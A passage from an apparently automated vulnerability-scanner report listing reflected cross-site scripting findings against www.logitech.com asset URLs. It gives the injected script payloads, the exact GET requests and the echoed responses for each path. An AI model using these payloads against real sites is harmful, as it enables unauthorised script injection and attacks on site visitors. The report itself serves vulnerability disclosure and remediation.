User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="b9b4e"><script>alert(1)</script>56ef9aed460/31162">
...[SNIP]...

1.69. http://www.logitech.com/assets/31163/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31163/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1be12</script><script>alert(1)</script>2744b2569f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1be12</script><script>alert(1)</script>2744b2569f5/31163/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','1be12</script><script>alert(1)</script>2744b2569f5/31163' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.70. http://www.logitech.com/assets/31163/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31163/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be596"><script>alert(1)</script>4b49c2ddca6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /be596"><script>alert(1)</script>4b49c2ddca6/31163/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:16 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="be596"><script>alert(1)</script>4b49c2ddca6/31163">
...[SNIP]...

1.71. http://www.logitech.com/assets/31246/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31246/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78bed</script><script>alert(1)</script>bff5dcc6c3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /78bed</script><script>alert(1)</script>bff5dcc6c3f/31246/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','78bed</script><script>alert(1)</script>bff5dcc6c3f/31246' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.72. http://www.logitech.com/assets/31246/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31246/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e89"><script>alert(1)</script>65b1efb4be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /d0e89"><script>alert(1)</script>65b1efb4be6/31246/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="d0e89"><script>alert(1)</script>65b1efb4be6/31246">
...[SNIP]...

1.73. http://www.logitech.com/assets/31254/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31254/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2412</script><script>alert(1)</script>b9b9be1673f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /c2412</script><script>alert(1)</script>b9b9be1673f/31254/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','c2412</script><script>alert(1)</script>b9b9be1673f/31254' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.74. http://www.logitech.com/assets/31254/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31254/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37054"><script>alert(1)</script>804e8fe3a5c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /37054"><script>alert(1)</script>804e8fe3a5c/31254/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="37054"><script>alert(1)</script>804e8fe3a5c/31254">
...[SNIP]...

1.75. http://www.logitech.com/assets/31677/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31677/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45607"><script>alert(1)</script>73821424e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /45607"><script>alert(1)</script>73821424e66/31677/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="45607"><script>alert(1)</script>73821424e66/31677">
...[SNIP]...

1.76. http://www.logitech.com/assets/31677/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31677/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e63ae</script><script>alert(1)</script>f1eeb453aae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /e63ae</script><script>alert(1)</script>f1eeb453aae/31677/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','e63ae</script><script>alert(1)</script>f1eeb453aae/31677' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.77. http://www.logitech.com/assets/31923/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31923/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c6fe</script><script>alert(1)</script>eaf84f7ce9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6c6fe</script><script>alert(1)</script>eaf84f7ce9d/31923/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','6c6fe</script><script>alert(1)</script>eaf84f7ce9d/31923' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.78. http://www.logitech.com/assets/31923/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/31923/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ba30"><script>alert(1)</script>1f3588020d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /6ba30"><script>alert(1)</script>1f3588020d7/31923/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="6ba30"><script>alert(1)</script>1f3588020d7/31923">
...[SNIP]...

1.79. http://www.logitech.com/assets/32564/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/32564/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb32a</script><script>alert(1)</script>7ade0831ab8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bb32a</script><script>alert(1)</script>7ade0831ab8/32564/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','bb32a</script><script>alert(1)</script>7ade0831ab8/32564' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.80. http://www.logitech.com/assets/32564/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/32564/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d42c"><script>alert(1)</script>58dfc3ea3b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /6d42c"><script>alert(1)</script>58dfc3ea3b1/32564/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="6d42c"><script>alert(1)</script>58dfc3ea3b1/32564">
...[SNIP]...

1.81. http://www.logitech.com/assets/33033/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33033/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c807b"><script>alert(1)</script>5ec5abf305e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c807b"><script>alert(1)</script>5ec5abf305e/33033/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c807b"><script>alert(1)</script>5ec5abf305e/33033">
...[SNIP]...

1.82. http://www.logitech.com/assets/33033/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33033/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b13</script><script>alert(1)</script>df733b2b0ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /48b13</script><script>alert(1)</script>df733b2b0ec/33033/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','48b13</script><script>alert(1)</script>df733b2b0ec/33033' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.83. http://www.logitech.com/assets/33048/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c06c</script><script>alert(1)</script>0c7d00fb515 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /3c06c</script><script>alert(1)</script>0c7d00fb515/33048/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:40 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','3c06c</script><script>alert(1)</script>0c7d00fb515/33048' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.
...[SNIP]...

1.84. http://www.logitech.com/assets/33048/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bb29"><script>alert(1)</script>1d38559caff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /7bb29"><script>alert(1)</script>1d38559caff/33048/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="7bb29"><script>alert(1)</script>1d38559caff/33048">
...[SNIP]...

1.85. http://www.logitech.com/assets/33048/2/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/2/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7137"><script>alert(1)</script>a11adaf5bed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /c7137"><script>alert(1)</script>a11adaf5bed/33048/2/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="c7137"><script>alert(1)</script>a11adaf5bed/33048/2">
...[SNIP]...

1.86. http://www.logitech.com/assets/33048/2/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /assets/33048/2/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2207</script><script>alert(1)</script>faa6bb4caa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

